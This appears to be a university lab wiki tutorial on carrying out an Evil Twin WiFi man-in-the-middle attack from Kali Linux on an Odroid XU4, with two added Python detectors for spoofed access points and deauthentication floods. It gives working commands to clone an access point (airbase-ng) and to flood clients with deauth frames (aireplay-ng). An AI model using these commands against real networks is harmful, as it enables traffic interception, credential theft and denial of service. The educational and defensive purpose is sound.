Evil Twin Attack via Kali on Odroid XU4

From Embedded Lab Vienna for IoT & Security
Revision as of 18:38, 1 January 2023 by JHangstein (talk | contribs) (Updated summary to give a more in-depth overview over the attack and its implications. Added a paragraph detailing MitM.)

Summary

The Evil Twin (ET) Attack is a type of Machine-in-the-Middle (MitM) attack that is carried out via WiFi. The basic premise of the attack is to fool victims into thinking they are connecting to a legitimate access point (AP), when in fact they are connecting to the "evil twin" AP.

The goal of the attack usually coincides with the typical goals of any MitM attack. Since all traffic that leaves the local network for the internet passes through the default gateway, an attacker can intercept all outgoing traffic once a client is connected to the ET. The attacker then forwards the traffic received from the victim to the legitimate gateway, posing as the victim machine. Network traffic now flows as normal, but via the attacker. Endpoints can still communicate with each other as before, but the victim's data is now at the attacker's mercy. This data can be passwords or entire sessions used to access e-mail accounts or social networks. Measured against the CIA triad, the implications are massive: an attacker in this position can compromise confidentiality by eavesdropping and integrity by modifying messages, and can intercept, modify or destroy messages to compromise availability.

The attack is conducted as follows. First, the attacker has to figure out which access point the intended victim is using. If no specific victim is targeted, attackers can also choose a commonly used access point such as a public WiFi hotspot. Once the access point to be impersonated is chosen, the attacker has to take note of the AP's Service Set Identifier (SSID) and Basic Service Set Identifier (BSSID). The SSID is the name displayed to users trying to connect to a WiFi AP, while the BSSID is the physical MAC address of that AP. Obtaining both is no complicated feat, as access points broadcast them constantly to allow users to connect. If the attacker broadcasts this information themselves, the evil twin shows up in the list of access points on the victim's device with the same SSID and BSSID as the legitimate access point. With the tools described in more detail below, clients can be disconnected from the legitimate AP. The goal is then to broadcast with a stronger signal than the legitimate access point, so that users connect to what looks like the "best" available access point.

If the original access point is password protected, additional measures are needed. Password-protected access points are not immune to Evil Twin Attacks, especially when the password is easy to obtain. This includes cafés, hotels and similar businesses that share the password of their access point with their customers. But even the password of a private WiFi hotspot can be obtained through unsophisticated social engineering: an attacker innocently asking for the WiFi password can fool someone who knows it into giving it up. Another possibility is capturing a WPA handshake between the legitimate AP and a client and cracking the transmitted hash. In any case, as soon as the password is obtained, it can be added to the evil twin configuration.


Requirements/Hardware

Operating system: Kali Linux ODROID-XU3 [1]

Hardware:

  • WiFi
  • Client connected to WiFi
  • ODROID XU4 single-board computer (incl. power supply unit 5V/4A)
  • eMMC (min. 8GB)
  • microSD (min. 8GB)
  • microSD to USB adapter
  • Mouse
  • Keyboard
  • Monitor (via HDMI)
  • WiFi adapter (e.g. Alfa AWUS036EAC)

Installing Kali on ODROID XU4

Step 1: Download

Download the Kali image. The ODROID XU4 is very similar to the ODROID XU3, so the XU3 image can be used for the XU4 too.

Step 2: Preparation

  • Insert the microSD card into your PC (if required, use the adapter)
  • Format the microSD card, e.g. with "SD Formatter" [2]. If you use "SD Formatter", don't forget to check "Format Size Adjustment" under "Options".
  • Write the OS image to the microSD card. Required: a program to create bootable devices, e.g. Win32 Disk Imager for Windows [3].

Step 3: Installing

For the following steps you might need the manual of the ODROID XU4 [4] to see where the mentioned parts are located.

  • Attach the eMMC module to the ODROID XU4
  • Switch the Boot Mode Selector to "microSD"
  • Insert the microSD card
  • Attach mouse, keyboard and monitor to the XU4. Make sure that all of them are attached before booting, otherwise you will get a kernel error.
  • After that, attach the power supply.


If all steps were performed correctly:

  • The fan of the ODROID XU4 starts
  • The blue LED should be on (solid light): bootloader running.
  • The monitor should show the boot process.

This can take a while.

Username: kali
Password: kali


States of the ODROID XU4 LED:

  • red LED (solid): power is available
  • blue LED (solid): bootloader is running
  • blue LED (slow heartbeat blink): kernel is running
  • blue LED (fast blink): kernel panic

Performing Evil Twin on ODROID XU4

First, attach the WiFi adapter to the XU4, reboot and check whether it is recognized:

sudo reboot
sudo ifconfig


List the available wireless interfaces:

sudo iwconfig 


Check the status of the wireless interfaces:

sudo airmon-ng


Start monitor mode on the available wireless interface:

sudo airmon-ng start <interface> <channel>

Note: the output has to contain "monitor mode enabled".


If necessary, kill interfering processes and execute the command again:

sudo airmon-ng check kill
sudo airmon-ng start <interface> <channel>


Capture packets:

sudo airodump-ng <interface> -c <channel>

After 30-40 seconds, press Ctrl+C, leave this terminal as it is and open a new one.


Creating the twin

sudo airbase-ng -a <BSSID> --essid <ESSID> -c <channel> <interface>

The BSSID, ESSID and channel are taken from the previous airodump-ng output; they are required to impersonate the legitimate AP. After running the command, airbase-ng has turned the wireless adapter into an access point. Open a new terminal.
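From the defender's side, the spoofed SSID/BSSID pair created above is visible in the same kind of airodump-ng scan data the attacker works from. The following Python script is an added example, not code from the original page: it parses constructed airodump-ng style CSV output against an assumed inventory of trusted access points and flags the classic Evil Twin signatures, namely a trusted SSID advertised by an unknown BSSID, a trusted BSSID appearing on an unexpected channel, and a downgrade from WPA2 to an open network.

```python
import csv
from io import StringIO

# Constructed airodump-ng style CSV output (AP section only); not a real capture.
SAMPLE_CSV = """BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
AA:BB:CC:DD:EE:01, 2023-01-01 12:00:00, 2023-01-01 12:01:00,  6, 54, WPA2, CCMP, PSK, -62, 120, 0, 0.  0.  0.  0, 7, LabWiFi,
DE:AD:BE:EF:00:01, 2023-01-01 12:00:30, 2023-01-01 12:01:00,  6, 54, OPN, , , -40, 300, 0, 0.  0.  0.  0, 7, LabWiFi,
AA:BB:CC:DD:EE:02, 2023-01-01 12:00:00, 2023-01-01 12:01:00,  1, 54, OPN, , , -45, 250, 0, 0.  0.  0.  0, 5, Guest,
11:22:33:44:55:66, 2023-01-01 12:00:00, 2023-01-01 12:01:00,  1, 54, WPA2, CCMP, PSK, -80, 90, 0, 0.  0.  0.  0, 8, Neighbor,
"""

# Assumed inventory of our own access points: SSID -> {BSSID: (channel, privacy)}.
TRUSTED = {
    "LabWiFi": {"AA:BB:CC:DD:EE:01": (6, "WPA2")},
    "Guest": {"AA:BB:CC:DD:EE:02": (11, "WPA2")},
}

def parse_airodump_csv(text):
    """Return the AP rows of an airodump-ng CSV as dicts; stop at the station section."""
    aps = []
    for row in csv.reader(StringIO(text)):
        fields = [f.strip() for f in row]
        if not fields or fields[0] in ("", "BSSID"):
            continue  # blank line or column header
        if fields[0] == "Station MAC":
            break  # station rows have a different column layout
        aps.append({"bssid": fields[0].upper(), "channel": int(fields[3]),
                    "privacy": fields[5], "power": int(fields[8]), "essid": fields[13]})
    return aps

def find_evil_twins(aps, trusted):
    """Flag APs that advertise one of our SSIDs but do not match the inventory."""
    alerts = []
    for ap in aps:
        known = trusted.get(ap["essid"])
        if known is None:
            continue  # not one of our SSIDs: out of scope for this check
        if ap["bssid"] not in known:
            alerts.append((ap["bssid"], ap["essid"], "unknown BSSID advertising trusted SSID"))
            continue
        channel, privacy = known[ap["bssid"]]
        if ap["channel"] != channel:
            alerts.append((ap["bssid"], ap["essid"], f"trusted BSSID on unexpected channel {ap['channel']}"))
        if ap["privacy"] != privacy:
            alerts.append((ap["bssid"], ap["essid"], f"security downgrade {privacy} -> {ap['privacy']}"))
    return alerts

if __name__ == "__main__":
    for bssid, essid, reason in find_evil_twins(parse_airodump_csv(SAMPLE_CSV), TRUSTED):
        print(f"ALERT {essid} ({bssid}): {reason}")
```

A clone that copies BSSID, channel and WPA2 settings exactly would pass these inventory checks, which is why wireless IDS sensors additionally compare beacon timestamps and sequence numbers of frames carrying the same BSSID.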


In the next step the client and the XU4 will lose their internet connection. Because the XU4's WiFi adapter is busy acting as an access point, the XU4 needs either a second WiFi adapter or an Ethernet connection to reach the internet.

Telling the Client to get lost

Disconnect all clients:

sudo aireplay-ng --deauth 0 -a <BSSID> <interface> --ignore-negative-one

The "0" indicates how fast the deauthentication packets are sent (in seconds); 0 is the fastest option. This command sometimes does not work, because it can produce a broadcast storm and some WiFi routers therefore filter these packets.

Disconnect a specific client: First run the airodump-ng command again, restricted to the router's BSSID, to obtain the MAC address of the client:

sudo airodump-ng wlan0 --bssid <router's BSSID> -c <router's channel>

Then execute the deauth command:

sudo aireplay-ng --deauth 0 -c <client's MAC address> -a <router's MAC address> <interface>


Error handling

If neither disconnecting all clients nor disconnecting a specific client worked, check whether the card supports packet injection:

sudo aireplay-ng --test wlan0
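The deauthentication step is the noisiest part of the attack and the easiest to detect: a sensor in monitor mode sees a burst of deauthentication frames that claim to come from the legitimate BSSID, either to the broadcast address (the "disconnect all clients" form) or to a single client (the targeted form). The following Python detector is an added example, not code from the original page; it runs a per-source sliding-window count over a constructed frame log. The frame subtype names, the log layout, the 20-frames-per-second threshold and the window length are assumptions.

```python
from collections import defaultdict, deque

BROADCAST = "FF:FF:FF:FF:FF:FF"
AP1, AP2, CLIENT = "AA:BB:CC:DD:EE:01", "AA:BB:CC:DD:EE:02", "66:77:88:99:AA:BB"

# Constructed management-frame log as a monitor-mode sensor might record it:
# (timestamp in seconds, frame subtype, source/BSSID, destination). Not real capture data.
SAMPLE_FRAMES = [
    (0.00, "beacon", AP1, BROADCAST),
    (0.10, "deauth", AP1, CLIENT),          # a single deauth is normal AP behaviour
    (0.20, "probe_resp", AP1, CLIENT),
]
# Burst 1: 60 broadcast deauths in 0.6 s, the footprint of "--deauth 0 -a <BSSID>".
SAMPLE_FRAMES += [(5.0 + i * 0.01, "deauth", AP1, BROADCAST) for i in range(60)]
# Burst 2: 30 deauths aimed at one client, the footprint of "--deauth 0 -c <client> -a <BSSID>".
SAMPLE_FRAMES += [(9.0 + i * 0.02, "deauth", AP2, CLIENT) for i in range(30)]

def detect_deauth_flood(frames, window=1.0, threshold=20):
    """Alert once per burst when a source sends >= threshold deauth frames within window seconds."""
    recent = defaultdict(deque)   # source -> deque of (timestamp, destination) inside the window
    last_alert = {}               # source -> timestamp of the last alert, to report each burst once
    alerts = []
    for ts, subtype, src, dst in sorted(frames):
        if subtype != "deauth":
            continue
        q = recent[src]
        q.append((ts, dst))
        while ts - q[0][0] > window:
            q.popleft()  # drop frames that fell out of the sliding window
        if len(q) >= threshold and ts - last_alert.get(src, float("-inf")) > window:
            last_alert[src] = ts
            alerts.append({
                "time": ts,
                "source": src,
                "count": len(q),
                # a broadcast destination means every client of that BSSID is being kicked
                "broadcast": any(d == BROADCAST for _, d in q),
            })
    return alerts

if __name__ == "__main__":
    for a in detect_deauth_flood(SAMPLE_FRAMES):
        kind = "broadcast" if a["broadcast"] else "targeted"
        print(f"ALERT t={a['time']:.2f}s {kind} deauth flood from {a['source']}: {a['count']} frames in 1 s")
```

Spoofed deauthentication frames work at all because plain WPA2 leaves management frames unauthenticated; enabling 802.11w Protected Management Frames on AP and clients makes them get discarded, and detection like this remains useful where legacy clients prevent enforcing it.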

References